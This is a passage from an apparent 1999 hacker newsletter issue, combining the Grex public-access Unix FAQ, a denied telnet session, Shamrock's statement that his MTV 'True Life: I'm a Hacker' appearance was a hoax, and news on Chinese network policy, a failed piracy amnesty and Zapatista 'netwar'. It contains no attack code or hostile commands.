commands on Grex. (Built-in shell commands are not included). This will take a long time to run. * How do I use Unix commands? The Unix operating system is amazingly powerful and flexible, with thousands of commands. Unix can be a challenge to get started with, but if you are interested in learning Unix, Grex is a good place to start, since we do give you access to almost all commands. For a good introduction to basic Unix and VI usage, see Christopher Taylor's witty tutorial Unix is a Four Letter Word, or the University of Edinburgh's UNIXhelp for Users pages. Jennifer Myers has a good page of Unix links at the UNIX Reference Desk. Online reference information about most commands can be called up via the "man" command. For example, for information about the date command, type man date ---------------------------------------------------------------------------- Accounts and Passwords * Why do numbers appear before the login prompt? If you are telnetting to Grex when it is full, you must wait in a queue for a free port to telnet into. These numbers are telling you your place in line. There usually is no queue in the evenings in the eastern US and on weekends. * Why do I get a login prompt after I log out? This is in case there is a queue. it permits you to log in without waiting through the queue a second time. It is safe to disconnect when you are at the login prompt, or you can type "bye" or "exit" and Grex will disconnect. * Why does it say my new password is too obvious? Probably because it is too short, or only has lower case letters. It is important that internet vandals not be able to guess your password. Therefore, the Grex password change program is very particular about what it will accept. It is a good idea for your password to have at least 9 characters, at least one of which is an upper case letter, and at least one number or punctuation character embedded in it. Try the "genpass" program for some random passwords. * Why does it say my password is expiring? For security reasons, you should not keep the same password for too long. Grex passwords expire when they have not been changed for a whole year. All you have to do is run the "change" program to change your password, and you will stop getting nagged when you log in. Please remember to write your new password down when you change it, so you won't forget it. * Grex said, "3 failures since last login," when I logged in. What does this mean? When someone tries to log in to your account but does not know the password, Grex keeps count of failed login attempts. In general if there are only two or three of them, it probably means someone made a typo at the login prompt. This happens most often for accounts with very short user IDs and those with popular names, such as "ken". Less commonly, login failures may occur when someone runs telnet with the option to pass along the account name from another system. If it is a different account name, but matches yours, this will produce a failed login attempt for your account every time this person telnets to Grex. If there are 25 or 30 failed login attempts, or if the last successful login to your account wasn't yours, then it could mean that someone is trying to break in to your account. In general, most failed login attempts are from other people's typing errors and are not malicious. If you still suspect malicious activity, change your password (don't forget to write it down) and let the staff know so that they can investigate. * I can't remember my password. What do I do? Contact the Grex staff. Send mail from another site if you have access to email at another site. Send messages about access problems to staff@cyberspace.org. Remember to specify which account is the one you lost the password for. You can also log in to Grex as "trouble" without a password, which will send a message to the staff. Be sure to provide a postal address, an e-mail address, or a local telephone number, so that the staff can contact you in return. * I have a Grex account. Why do I get "No such loginid?" This means that your account has been deleted. Accounts on Grex are deleted if no one logs in for more than 3 months. There is not enough room on Grex to keep old unused accounts. To avoid losing your account, you should log in every month or two. Accessing your web page, or having your mail get forwarded does not count, but conferencing over the web using your account and password in Backtalk does count as logging in for this purpose. If your account has been deleted, it usually cannot be recovered or restored. Please feel free to recreate the account. * I don't want to use my account anymore. How do I get it deleted? If you don't want to wait until your account expires, you have to log in one last time and send a message to staff@cyberspace.org from the account that you want deleted. In your message, ask for it to be deleted. * Why can't I enter control-C when I am creating my account? When creating an account by telnet, you are asked to provide the characters you wish to use for various purposes. People using Macintosh NCSA Telnet have experienced the behavior that when they type ^C, the program exits rather than accepting the ^C as the designated control character. This is caused by undesirable preferences within that program and is easy to fix. Look at the "Session" menu, at the "Setup Keys" menu item (or hit command-S). You will probably find that you have a setting for "interrupt process" which is set to ^C. If so, NCSA Telnet is honoring this setting and sending the "interrupt process" signal (part of the time-worn telnet protocol) whenever you type ^C. Blank this setting out and then save your telnet set in a file. If you start telnetting by double clicking on the saved settings, you won't have to remember to clear it each time. ---------------------------------------------------------------------------- E-Mail * How do I get Grex to forward my mail to another site? Use the "change" command. Just type "change" at a shell prompt or "!change" at any other prompt. This will invoke a menu that allows you to change almost any setting on your account, including the mail forwarding option. There are certain restrictions on the use of forwarding, so make sure you are following the rules.. * I set up .forward myself. Why doesn't it work? Probably because it is not world readable. .forward files must be world readable in order to be valid on Grex. If you are looking for a way to forward your mail to an anonymous place, you need to find an anonymous remailer system. Grex doesn't do this. To make your .forward file world readable, change to your home directory (type: cd) and then issue this command: chmod 644 .forward Your home directory must also be world accessible; type: chmod 755 . or use 711 instead of 755 if you don't want other people to be able to scan your directory. * How can I hide my forwarding address? You can't. If you have forwarding enabled, the address must appear in the finger command. There is no way to hide the address that you are forwarding to. Grex does not wish to provide anonymous remailing services. You may wish to make use of one of the anonymous remailers listed on the Yahoo page http://dir.yahoo.com/Computers_and_Internet/Security_and_Encryption/Anonymous_ Mailers/. * How do I read mail with Netscape or Eudora? You can't. Those are POP clients, and Grex doesn't run a POP server. This is because Grex is intended to be an on-line community, and having a POP server would encourage people to use Grex as a mail drop instead, never logging on, and so never having a chance to become part of the Grex community. You must log in to Grex in order to read your mail. * My mailbox is getting heavily spammed. What can I do? Spam (unwanted mail) is unfortunately very common on the internet. Grex's mail transport system has numerous filters to reduce spam, but it does not eliminate it. The Grex staff may or may not be able to help you reduce the spam you are getting. The proper way to report spam is to forward a copy of one of the offending messages to abuse@cyberspace.org. Do not send multiple messages. The message you send MUST be accompanied by the full mail headers, so that we can determine its true origin. The origin of spam is often hidden, and may require detailed examination of these headers. If you use pine, you can view these headers with the "H" command. * Why is mail that I send to Grex getting rejected? This usually happens when the sending site is not configured properly. Problems in mail configuration can often lead to mail that has an invalid return address. Grex's mail system tries very hard to detect and reject invalid sending addresses, in order to reduce the amount of spam (unwanted mail) on Grex. If your mail looks like spam, then Grex will reject it. If you think this is happening to your legitimate mail, send a rejected copy of it to grex-staff@pmtech.com, and be sure to include all of the mail headers. Other common reasons for mail to Grex to be rejected are that it may be too large ( over 100k) or your mailbox may have grown too large (over 600k). Mail will be rejected in these cases. * Why does pine say that it cannot open my mail folder? Actually, that is probably just a faulty error message. For new accounts, it only means that you haven't received any mail yet. Once you receive some mail, the message should go away forever. We are working on getting rid of this error message. * How do I get pine to save my outgoing mail? This feature is turned off on Grex by default, because lots of new users were accumulating vast files of old mail without ever knowing that they were doing it. You're quite welcome to create the folder, as long as you keep an eye on your disk usage so that you don't exceed Grex's 1 megabyte limit for your account. To create your saved-mail folder, go into the pine configuration screen and look for the setting for "default-fcc". Set it to "saved-mail" or whatever name you would like to use. You need to use quotation marks around the file name. * How do I send attachments? Please do not send large attachments. If you have a small one, so that your mail remains under 100 K bytes in size, then you can send attachments from Grex. Once the file is in your home directory on Grex, then when composing a message in pine, put the file name on the attachments line. Please remember to delete the file after sending it as an attachment, so that you do not fill up your allotted disk space. * How can I view an attachment file named myfile.doc? Any file that ends with ".doc" is probably a Microsoft Word file. There is no way to view such a file on Grex. You will have to download that file to a computer that has Microsoft Word or some other word processor that can import such files. * How can I set the "From" header in pine for my outgoing mail? In Pine on Grex, you can't set the "From:" field. This is disabled because there were too many problems with people setting invalid addresses, which caused their outgoing mail to bounce to the postmaster whenever it was undeliverable. * How do I set up a mailing list here? You can't. We're sorry, but this is not permitted. You can only forward mail to a single site elsewhere on the internet. Mailing lists are too resource intensive for Grex to support. You may wish to try using an advertising-based free mailing list service. The Free Center maintains a rated list of free mailing list providers. * Is it OK to collect my mail by FTP? Yes, but you must do it correctly. It is a extremely risky to attempt to transfer your mail spool file directly off of Grex by FTP. You risk losing some or all of your collected mail, because the FTP daemon does not participate in the locking scheme used by the mail delivery programs on Grex. In addition, your account may appear to be abandoned because FTP connections do not update the date of last login. This could result in loss of your account if it is the only way you use Grex. Instead, we recommend telnetting to Grex and running a mail client program. These all do participate in the locking mechanism for the mail spool. Collect all of your mail into a file in your home directory, and then log out. You may now safely fetch that file in your home directory by FTP. Please remember to delete it once it has been safely transferred. * Why can't I get procmail to work? Procmail is a mail filtering program, but it stopped working when Grex reorganized its mail system to use hierarchical mail directories. Grex really needs to have the mail organized hierarchically because of the very large number of users receiving mail. We hope to see procmail restored some day, but at the moment it is broken, and no schedule has been established for correcting it. * Can I set up an autoresponder to answer my mail while I am away for a while? Yes. Try the vacation program. The instructions can be found by typing "man vacation". ---------------------------------------------------------------------------- Dialing In * How can I dial into Grex? The short answer is to dial (734) 761-3000 with your terminal software set to 8-N-1. This process is described in detail in Grex's dial-up access information page. * If Grex doesn't answer the phone, how many times should I let it ring? We try very hard to keep all of the modems working properly, but sometimes, you may encounter a failure. Grex's phone lines are all configured so that if one modem doesn't answer after 3 rings, you are automatically transferred to the next line in the trunk hunt. If there happens to be a stuck modem, you need to wait at least 4 rings before a second one gets a chance to work. If there are two bad modems, then 7 rings are required. * If I can't get on by calling (734) 761-3000, is there another number I can try? No. Grex used to publicize other numbers in the interior of the hunt group, but there is no longer any advantage to calling any other number, because of this automatic stepping feature. Even if Grex is down, the phone should pick up once it steps past any bad modems. If it is down for an extended period, you should receive a short explanation from the terminal server. If the terminal server has failed, or the power to Grex's building has failed, the phones will not answer, but these conditions are very rare. * Why can't I get file transfer to work except for small files? Probably because you don't have a modem cable that is capable of handling hardware flow control, or your modem doesn't support it or has the feature turned off. ---------------------------------------------------------------------------- Privacy, Encryption, and Security * My personal information should be private. Why is it shown? When you look up your own user information, you can always see it, even if it is set up so that nobody else on the system can see it. To see what other people see, ask for the info about "youraccount@cyberspace.org" instead of just "youraccount". * How can I keep private the place I'm logged on from? This is considered public information on Grex. The only way to hide it is not to log on. * I am receiving unwanted chat requests. What can I do? You can adjust the chat settings for your account with the "change" command. To run it, type "change" at a shell prompt, or "!change" from a menu or from PicoSpan. Then choose "W) Write settings" and follow the menus from there. You can: turn off all chat requests, accept all chat requests, or select which users can and cannot chat with you. * How can I view my friend's files? Grex is a very open system, so directories are open to the public unless the owner decides to make them private. E-mail, however, is automatically saved in private files that the world cannot see. To permit a file so that it can be seen by others, type chmod a+r file-name To permit a directory, type chmod a+rx dir-name To hide a file or directory, type chmod ou-rx file-or-dir-name If you hide your home directory completely, neither mail forwarding nor web hosting will be available to you. You may make your directory accessible without being allowing it to be scanned. This is how: chmod 711 dir-name * Can I run PGP on Grex to protect my e-mail messages from being seen by others? No. PGP is not available on Grex for a number of reasons. The two most compelling reasons are that it would not be legal, and it would not offer you the protection you seek. We would like to see it be legally available to all, but in order to be effective, PGP must be installed on your own computer, not on Grex. Encrypting or decrypting a message on Grex would mean that the message would have to travel over an insecure network in plaintext before encryption or after decryption, and this is not the way to protect your message. In order to install PGP on your home computer, North American users should go to the MIT PGP Distribution Site at http://web.mit.edu/network/pgp.html, and all other users should use the international PGP home page at http://www.ifi.uio.no/pgp/. * Do you provide secure shell? Yes, we do. Secure shell (ssh) is a good way to connect because your session is encrypted, so that passwords cannot be intercepted by sniffers. Unfortunately, it is not fully functional on Grex, because the ssh daemon is unable to wait in line with telnet users when there is a queue, so ssh connections will fail when the system is full. You may see a message like this when it fails: Warning: no access to tty (Bad file number). When there is no queue you can use ssh to connect to Grex without any trouble.. ---------------------------------------------------------------------------- Programming * How do I compile a program? To compile a C program named foo.c, type gcc foo.c -o foo. This compiles foo.c and creates an executable program named foo. To run it, type ./foo Likewise, to compile a C++ program named foo.cpp, type g++ foo.cpp -o foo Please check with the Grex staff before compiling programs you bring in from the net. Most of the useful programs are already installed here, and many others will not run on Grex, but compiling them on Grex wastes a lot of bandwidth and cpu time — resources that Grex is short on. * Why can't I get the C compiler to compile my program? Probably you are using the wrong C compiler. Grex has two compilers installed. cc is only used for building certain system executables. It is not ANSI standard, and it lacks certain standard include files. You need to use gcc instead. This is a fairly recent version of the Gnu C compiler. It is ANSI standard and very complete. * I compiled my program. Why won't the system run it? Usually this is because the program is not on your path. Unlike a DOS or Windows system, on Unix the current directory is not automatically placed on your path. So if you compile a program named foo, you cannot run it by just typing "foo". You need either to place the executable somewhere on your path, or to precede its name with ./ (dot-slash) so you would type "./foo". * Can I install a "Bot"? Talker? Ircd? Mud? Mush? Muck? Moo? No. These are all servers, daemons, or programs that remain running after you have logged out. No program run by users is allowed to run after you log out. See the Grex Eggdrop Page from the Grex Staff Notes. At one time or another, the possibility of our installing some of these as official services has been discussed in the "coop" conference. We have never yet decided to do so, but if you are interested in pursuing this possibility, the Grex coop conference is the place to make your request. * Can I have a copy of Grex's newuser program? Yes, you can find out more about newuser, including availability, on this web page: http://www.cyberspace.org/~mdw/newuser.html. * Can I have a copy of Grex's write/chat/tel programs? Yes, you can find out more about write/chat/tel, including availability, on this web page: http://www.wwnet.net/~janc/write.html. * Can I have a copy of Grex's party program? Yes, you can find out more about party, including availability, on this web page: http://www.wwnet.net/~janc/software.html. ---------------------------------------------------------------------------- Miscellaneous * Why does my browser say "Can't find application" when I click on the "Telnet In" link? You need to configure your browser to find your telnet application program. The exact instructions for doing this vary widely depending upon both your operating system and your browser. In Netscape 3 this setting can be found in "Options"/"General preferences"/"Applications". Select the telnet application that came with your system, or one you downloaded from the internet. For more details about telnet applications, see the Grex Telnet Information page at http://www.cyberspace.org/telnet.html. * When I try to telnet to Grex, it hangs. Why can't I connect? There are several things that can go wrong. o You don't have DNS working properly. In this case you can connect to Grex by using its IP address. See below. o You are accessing the net via a firewall which blocks telnet. In this case you need to contact your security administrator for the LAN which you are accessing the net from, and ask if there is a way to telnet through the firewall. o Your telnet client is not working properly. You would not be able to telnet to any other site, either. Have you tried any? Try telnetting to hvcn.org and see if you get a login prompt. o Grex is down. This happens occasionally. You can usually tell if Grex is down by trying to access the web site. Try reloading to eliminate the possibility of a cached page. This won't be a good test if your connection uses a caching proxy server. o If it is none of the above, send mail to The Grex Staff and explain everything you tried, and also please specify the IP address and the GMT time that your attempt failed. If you can provide the results of a ping or traceroute from your end, that may prove to be helpful, too. * Can I do a ping or traceroute from Grex? These tools are not available on Grex. Vandals were using them to attack other sites. This is a ludicrous thing to do from Grex, because Grex is so tiny that its CPU and net connection become overloaded long before any other system would even begin to notice that it was being attacked. But people were doing it anyway, and hurting Grex. Regrettably, the actions of a few thoughtless people has forced Grex to disable these potentially valuable network analysis tools. You may be able to use a remote traceroute server on the web. See http://www.traceroute.org/. * What is Grex's IP address? At the time this answer was last updated, the IP address of Grex was 204.212.46.130, IP addresses may change at any time. In general we have little control over changes to our IP address. You should always use the hostname, because if the IP address does change, the DNS (Domain/Name Service) lookup of the hostname should produce the new IP address. If you unsure if a problem is due to DNS, you can test to see if you can connect using our IP address. However, if you can, it is strongly recommended that you resolve the problem you are having with DNS, so that you do not have to rely on inherently unreliable IP addresses. * Why does the "who" command show numeric IP addresses for some users? That is because this information is stored in a file (utmp) which only permits 16 characters of storage for this information. If the IP address exceeds 16 characters when converted to text form, then it is stored (and reported) only in its numeric form. This affects other commands besides the "who" command, such as the "finger" and "last" commands. * How much disk space can I use and how can I determine how much I am using? We ask folks to keep their disk usage under a megabyte. You can find out how much disk space you are using (in kilobytes) by running the following command in your home directory: du -sk The number that comes back is the number of kilobytes of disk you are using. If you are using more than 1024, please remove files. If you are thinking of putting something big in your account, please talk to the Grex staff (staff@cyberspace.org) first. There aren't many good reasons to put big things in your Grex account: Grex doesn't allow multimedia files on its web pages (not even gifs and jpegs), and most of the useful programs that will actually run on Grex are already installed on Grex. So please talk to the staff first. * Why doesn't my arrow key work, so I can edit previous commands in sh? This is because Grex is running a real sh, and that is a feature not supported by sh. What some Unix systems call sh is actually bash, an enhanced version of the sh shell which does this. If you would like to use bash instead, you should change your shell on Grex to bash. You can do that by running the change command. * Why can't I edit previous commands in tcsh? It is supposed to support it. Tcsh does support previous line editing. Emacs conventions for command-line editing is the default at most sites, though Grex uses vi as the default for command-line editing. So you have two options: If you are handy with vi, hit escape to jump into command mode, then start editing your line as you would with vi. The second option is to type set -o emacs at the prompt. After that, you should be able to edit your command line in a way that is familiar to you. If you prefer to always use emacs as your command-line editor, then you'll want to place the "set -o emacs" line in your .login file. * Why does the last line of each page of text disappear from the screen before I can read it? This happens when Grex doesn't know how many rows of text are on your screen. The easiest way to set this correctly is to run the "change" program on Grex. It will count rows for you and display the correct number at the top of your screen (sometimes it can take some fiddling to figure out whether your screen has 48 or 49 or 50 rows), and make the necessary changes to your startup files so that your settings will be right in the future. To run the change program, type "change" at a shell prompt, or "!change" from a menu or PicoSpan. Then select "change terminal type" and follow the menus from there. * Why do the bottom lines stay on the screen in the editor while the rest scroll normally? Same problem. Wrong number of lines in the setting. See solution above. * Why doesn't "screen" work when I disconnect from Grex? Grex runs a special daemon that kills all user processes when a user logs out. This prevents users from running servers or robots of any kind. It also prevents them from using the reconnect feature of screen (although the other features work fine). The reason for this policy is to prevent users from consuming our limited resources while not logged in. * I found a huge core file in my account. What should I do? Nothing really. This is a file that gets created if a program fails (crashes). It is intended to help the programmer find whatever bug caused the failure. If not renamed, these files will be deleted automatically in a day or two. You can delete it if you wish. By the way, a core file usually doesn't take up as much space on the disk as it appears to, because it is "sparse" (full of empty space). * How does the system decide where to put my home directory? Grex uses a hierarchical arrangement of home directories to keep the directory sizes from growing too large and thus becoming inefficient. So, on Grex, home directories are always located by a path of this form: /x/y/z/username The x is the disk letter, the y is the first letter of the username, and the z is the second letter of the username. Currently we have two disks that user accounts occupy, /a and /c (/b was not available). When we add a third disk, some users will be assigned on /d. The choice of disk is determined when your account is created, and this choice is switched back and forth manually by the staff to keep the available disk space balanced. The environment variable $HOME should always be set to the full path of your home directory. The ~ symbol may also be used as a shorthand for your home directory, as long as your shell supports it. (The Bourne Shell does not.) * Where can I get a self-contained multi-user chat program for my linux box? You might want to try out Grex's party program. See the Party Question in this FAQ. * I know something about Unix. How can I help the Grex staff? We are always delighted to have new volunteers One of the things that Grex needs most urgently is more people to answer "write help" requests. It is recommended that you check out the helpers conference. To turn on your helper flag, run the Unix command "mesg -h y". Also you should read the Grex Staff Note on the topic of volunteering to be on the Grex staff. ---------------------------------------------------------------------------- Last updated January 17, 1999 (srw) > telnet 24.x.x.x Sorry! You need to be a *validated member* of Grex to use outbound internet services, including ftp and telnet, to connect to anything other than Grex itself. To find out how to become a *member*, type "support" (without the quotes) at almost any prompt, or !support at the telnet or ftp prompt. To become a *validated* member, either pay for your membership with a personal check, or include a photocopy of a driver's license or other official ID along with your membership payment, or send mail to aruba (Grex's treasurer) to work out some other way of identifying yourself. Membership costs $6/month - cheap! Grex has lots of options that are available to non-members. Try typing "bbs" to join the conferences, or "menu" or "lynx" for two different menu systems that help you to find many options that you *can* use. If you have questions about Grex, you can find answers by joining the Info conference. (Type "bbs info" to get there). Or send mail to "staff". Thanks for trying out Grex! Trying x.x.x.x ... telnet: connect: Permission denied /usr/local/grex-scripts/.inet_real/telnet> quit > exit logout @HWA 10.0 Shamrock Says it Was All A Lie ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Pulling the SHAM out of SHAMrock... The much hyped and much talked about show on MTV "True Life: I'm a hacker" is exposed for the media circus it was and Shamrock from the weekly 'underground' web-tv news show PARSE (linked to from our site and can be seen at http://www.biztechtv.com/parse) explains in a statement how he took the folks from MTV for a ride and helped perpetrate the myth presented by MTV that all hackers are drug taking criminals, it should be noted that Shamrock could use a spell (and grammar) checker in his otherwise interesting comments on the whole fiasco. - Ed From HNN http://www.hackernews.com/ contributed by Shamrock The recent MTV special "True Life: I'm a Hacker" has caused quite a stir in the underground community. Now it seems that most of what was aired was just made up fiction anyway. A statement received by HNN from Shamrock, one of the people profiled in the show, alleges that a good chunk of the show was a farce put on by him to see just how gullible MTV was. (We aren't sure what to make of this. Is this the ultimate media hack or a childish prank that makes us all look bad? And why no verification by MTV?) Statement From Shamrock http://www.hackernews.com/orig/shamrock.html Comments About the Show From HNN Readers http://www.hackernews.com/orig/mtv.html True Life: I'm a Hacker http://www.mtv.com/mtv/tubescan/truelife/ Shamrock's statement; ~~~~~~~~~~~~~~~~~~~~ The following statement was received by HNN from Shamrock in regardes to the MTV television special True Life: I'm a Hacker Well, first I'd like to apoligize to the hacker community for giving MTV viewers a bad impression of what hacking is about. No doubtly this fiasco has taught you all what you should've already known, MTV and the media are completely full of shit. They don't care about giving an acurate depiction of what's happening in the world. Remember this is "television programming". They care only about sensationalism and soft drink advertising. I also owe the hacker community an explanation for what you saw on the show. There was mention in one of the HNN responses about "MTV was looking for someone guliable enough...." and thats what I assumed from the beginning, but I thought "could they be guliable enough themselves to actually air and credit themselves to the production of something like that?". I thought if they could, would there be any way that they would still be able to maintain credibility as journalists? I didnt think so. I also didn't think that when they asked if we could show them what types of crime take place in the hacker world that they would actually expect to see that. I also didn't think that they would take anything we showed them seriously. Apon our first meeting with MTV I told them about what kind of work we do at pseudo.com as far as web broadcasting goes and told them about other hacker related Internet resources they should check out. They were referred to 2600, HNN, Defcon and L0pht. With that left the way it was I figured that there would be no excuse for MTV not being able to produce an interesting special on hacker culture. Surprisenly (or not) they contacted us a few weeks later stating that they were not satisfied with what they had already gathered from other groups that had approached. They wanted more and at this point it becomes apparent that this wasnt being taken seriously (or if it was, they must be as guliable as they think we are). So we decided to take them for a ride (NOTE: at this point it was understood what was at risk, we had no intention of making hackers look bad. We waited for months to see if they would be realistic and after it was obvious that they wouldn't we figured the only option would be to discredit them with as much fiction as possible). The question was how far would they go. We already had our cast of charactures, next we needed we our plot. After setting the mood and introducing the compelling focus of our adventure we wanted to give them a climax. Unfortunatly, the part where we deliver the disk to the rival group and the police (which we had paid off) showed up and arrested our counterparts didnt make it into the MTV production. It's a shame too because we reallly wanted to see if we could actually get them to pay for and produce our own original presentation without them even knowing it. Sadly, our hoax didnt even come close to what we had intended. All I can do is reiterate to you just how fake and hollow what you see on television is. After this experience I wonder where if any truth lies in what we are told to watch, read and listen to. This is the obvious issue the hacker community needs to address. If the nation's intellectiual lowest common denomanator (television/music/etc audiences) and the media that caters to them are sucessful using programming to shape what their opinions are and what behavior they should endorse, is this not the same prolem that exists when our governments are utilizing technology as a means to control its population? If the media is knowenly skewing issues that are fact based to leave its audience with an unfounded impression of the truth, is it not the duty to those who know better to discredit the false source and to provide the audience with the rest of the facts? Isn't this similar to a situation where a government is developing or employing technology in a form that violates our rights to privacy and the public that is embrassing it unaware of what is really happening? or high techonology industries that capitalize on a public that pays for products or services that fall short of its claim's? I think it would be very hard for anyone with a brain to take MTV seriously now and I hope noone does. I also hope that now this leaves open the opprotunity for a source to emerge that will be everything that the mainstream media isn't. I also hope this source encompasses everything that HNN, HNC and the other various hacker resources (which should've been feartured in the first place) are about. Oh yeah, your also probably asking yourself what the fuck is this parsetv.com shit all about? Do you really think that we are some kind of "information security resource"? or "hacker culture outlet"? No. We're entertainment. We use the web as a form of free speech to do whatever the hell we want in an effort to entertain the people that watch us. Any issues related to the hacker community that we follow, we do so as an obligation to web community as a whole. If there is a vulnerability that exists we share it because its probably in our viewers best interest to know so, as far learning more about it or getting further detail all we can do is refer the audience to the proper source for that information. If an issue is brought up related to the laws and regulations that relate to the web, we feature it also due to the fact that it's in the best interest of all web users to know. We do not claim to be the "consultants" or "experts" that other people claim to be (and are in fact not, um JP). My personal interest in computers and technology is just that, personal interest. I got interested in hacking and it's culture because I wanted learn more about it and its relation to the everyday world that non-hackers live in. Not everyone that read's 2600 or goes to Defcon does so because they want to be a hacker, or grow up to work in IT. Everyone has their own reasons. I think to many of you I represent a much bigger concern of yours and thats the growing number of non-hackers that have an interest in hacking but don't follow the traditional roles. Well get use to it because you can expect to see alot more of that as the web grows. As the web becomes more and more assimulated in our everyday lives, there will more and more people out there getting interested in hacking "FO ALL DA WRONG REASONS". All the hacker community can do about it is provide a responsable model for the ones who take it more seriously than others. The others will just become what they were to begin with, irrelavent to what hackers are really tring to do. I wholeheatly apoligize to those offended. The issues that hackers are out there tring to address are some of the most important issues that face the country, but it seems that the wrong people are listening and the right people are not. There is no doubt that the messages hackers are tring to convey need to be heard by the rest of the country, just don't expect that to happen through mainstream media. Mainstream media is content with keeping mainstream audiences ignorant and without discrediting what the media is saying, the ignorant will continue to listen. @HWA 11.0 China Fortifies Cyber Defenses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ir0nMaiden [Translated from Chinese] The Ministry of Information Industry, Ministry of Public Security, and Ministry of State Security in Hong Kong issued a joint memorandum urging all state and private organizations to not connect internal computer systems to the world wide internet. This is in direct response to the threat of cyber attack from Taiwanese intruders. The Ministry of Information and Industry have also established the China Computer Network Security Management Center. Fearing that imported computers and software may contain security holes, Trojan Horses, or Backdoors the ministry is also asking that the development of domestically-made computers and software systems be increased. Hong Kong Ming Pao http://www.mingpao.com/newspaper/ (Chinese) @HWA 12.0 Amnesty Program for Pirated Software Fails Miserably ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evilwench An amnesty program for pirated software, sponsored by Microsoft and Adobe, failed to get even one copy of pirated software. While several people went to the event for the free t-shirts and other goodies, not one person showed up with software they thought might have been pirated. SF Gate http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/10/16/BU18704.DTL S.F. Treasure Hunt for Pirated Software Flops Rally for turn-ins fails to produce any of the illegal booty Benny Evangelista, Chronicle Staff Writer Saturday, October 16, 1999 Microsoft Corp. attorney Anne Murphy was hoping people who were using pirated software would drop on by Justin Herman Plaza to turn in their illegal booty. But to perhaps nobody's surprise but her own, yesterday's mildly publicized ``Ask If It Is Licensed'' event did not draw one single repentant soul. There were plenty of folks who came for the free T-shirts and free software. And at least one man was more concerned about a different sort of intergalactic fraud. Maybe Microsoft should have called the event ``Ask, But Don't Tell.'' ``We're disappointed,'' said Murphy, the chief anti-piracy enforcement official for the Redmond, Wash., software colossus. She said a similar event in San Diego drew about 40 computer sellers who wanted to see if their software was legit, and ``the vast majority was counterfeit.'' Microsoft and publishing software-maker Adobe Systems of San Jose sponsored the event to publicize how consumers can tell if their software was illegally copied and to evangelize about the evils of piracy. The companies weren't there to throw violators in the slammer but would have exchanged genuine software for illegal copies. Then the illegal programs would serve as evidence to hunt down the real perpetrators -- the people who actually copied and sold the software. Piracy cost the California economy an estimated 18,000 jobs and $244 million in lost tax revenue in 1998. The estimated rate of illegal software installed statewide last year was about 29 percent, about eight percentage points higher than in 1997. Software piracy includes both individuals and companies that make and distribute illegal copies of legal software and criminals who make and sell counterfeit software. In a separate ceremony in Palo Alto, Gov. Gray Davis signed an executive order setting government policy for state agencies to use only legal copies of software. President Clinton signed a similar order covering federal agencies a year ago. Yesterday, Microsoft also filed federal suits against four Northern California computer sellers, including one in Fremont. Microsoft has filed more than 160 similar suits nationwide in the past year. The people who drifted by during the four-hour event mostly appeared to be workers enjoying the midday sun rather than software desperadoes. Passers-by interviewed agreed that using illegal software was bad, although only a few said they would actually walk up to Microsoft admitting their deed if they were. Some even ranked shoplifting a candy bar as a worse crime. One 29-year-old accountant from Dublin happily admitted sharing his copy of Chessmaster 3000 with 10 friends. ``I bought it, and I can give it to my friends if I want,'' said the man, who didn't want to give out his name for fear Microsoft enforcers ``would get bored one day and send their legal team after me.'' Frank Chu, 39, of Oakland didn't care about software at all. He was trying to get in front of television cameras with a sign that read, ``Impeach Clinton. 12 Galaxies Guiltied to A Techtronic Rocket Society.'' ``Clinton has freely committed treason against 12 galaxies,'' Chu explained. Murphy hoped no one would take the free software given to a select few in the crowd and make copies. ``For someone to learn about piracy and then go out and negatively impact the California economy would be a little bit cheeky,'' Murphy said. Australian tourist Quentin Chester said software piracy wasn't high on his list of concerns. ``In Australia, we don't tend to be fussed about this stuff,'' said Chester, 41. ``Australians are pretty laid back.'' @HWA 13.0 A New Look at InfoWar ~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by M0ney Is Cyberwarfare about Denial of Service Attacks, web page defacements, and network break-ins? Or is it more about Information dissemination, media manipulation and good ole propaganda? The Zapatista guerrillas, fighting for their freedom in Mexico, use the Internet to their advantage but not in a way you might think. Time http://www.pathfinder.com/time/magazine/articles/0,3266,32558,00.html TIME SPECIAL REPORT/THE COMMUNICATIONS REVOLUTION/ LANGUAGES OF TECHNOLOGY OCTOBER 11, 1999 VOL. 154 NO. 15 Wired For Warfare Rebels and dissenters are using the power of the Net to harass and attack their more powerful foes BY TIM MCGIRK/MEXICO CITY In the Chiapas jungles of southern Mexico during the mid-1990s, Zapatista guerrillas--fighting for the rights of Mayan peasants--evolved a new method of conflict: "cyberwar." A mode of battle that involves the Internet and other forms of telecommunication, cyberwar, or Netwar, is employed with increasing frequency by rebels, terrorists and governments around the world. A Netwar can be pure propaganda, recognition that modern conflicts are won as much by capturing headlines as by capturing territory. But a Netwar can have more dangerous applications when computer viruses or electronic jamming are used to disable an enemy's defenses, as both Serb and NATO hackers proved in Kosovo by unleashing barrages of propaganda and attempting to bring down each others' telecommunications systems. When they rebelled in 1994, the poorly armed Zapatistas were no match for the Mexican army in Chiapas. But their spokesman, Subcomandante Marcos, is an agile media manipulator. A renegade college professor who hides his face in a ski mask, Marcos titled his Ph.D. dissertation The Power of the Word. In the battle for public sympathy, he knows his laptop is a more effective weapon than an AK-47 Kalashnikov rifle. Using a network of universities, churches and non-governmental organizations (NGOs) in Mexico, the U.S. and Canada--all linked through the Internet--Marcos mobilized international pressure to make the government cease its assaults against the Zapatistas. When the Mexican army declared in December 1994 that it had surrounded the 12,000 rebels, Marcos dispatched news that the Zapatistas had slipped out of the trap and conquered dozens of villages. It wasn't true, but according to cyberwar specialists the Zapatistas' disinformation campaign caused enough confusion to help touch off a run on the peso, plunging Mexico into recession. The Zapatistas' tactics also attracted the attention of military strategists. The U.S. Army, for one, sponsored a 1998 study on the group's tactics by the Rand think-tank. "Marcos is not a computer geek," says John Arquilla, a defense information expert at the U.S. Naval Postgraduate School in Monterey and co-author of the Rand report The Zapatista Social Netwar in Mexico. "He's more committed to the idea of info revolution." That revolution is spreading. These days missiles are not only tipped with warheads but with video cameras; television and radio deliver war news as it happens; and alleged eyewitness accounts of battles and massacres appear on the Internet, quickly finding their way into other media. What matters in today's combat, says Arquilla, "is whose story wins." Not surprising, then, that 12 of the 30 terrorist organizations identified by the U.S. State Department have their own websites. Armies are also entering this digital arena. Sweden's leading military college recently graduated several infowar specialists, and the American military academy West Point is expected to add cybercombat 